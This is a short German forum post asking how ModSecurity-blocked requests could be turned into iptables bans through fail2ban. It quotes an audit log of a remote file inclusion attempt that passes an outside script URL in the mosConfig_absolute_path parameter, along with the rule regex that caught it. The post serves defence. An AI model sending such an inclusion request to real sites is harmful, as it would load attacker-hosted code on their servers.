Hi BeNe,
müsste auch über fail2ban klappen ... aber kann man die regex nicht so umschreiben das statt 403 - iptables blockt?
Also solche Logs direkt blockieren ohne erst ne Fehlermeldung:
Code:
GET /?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxxxxx.tld
User-Agent: libwww-perl/5.808
--ba07427a-H--
Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
Producer: ModSecurity v2.1.1 (Apache 2.x)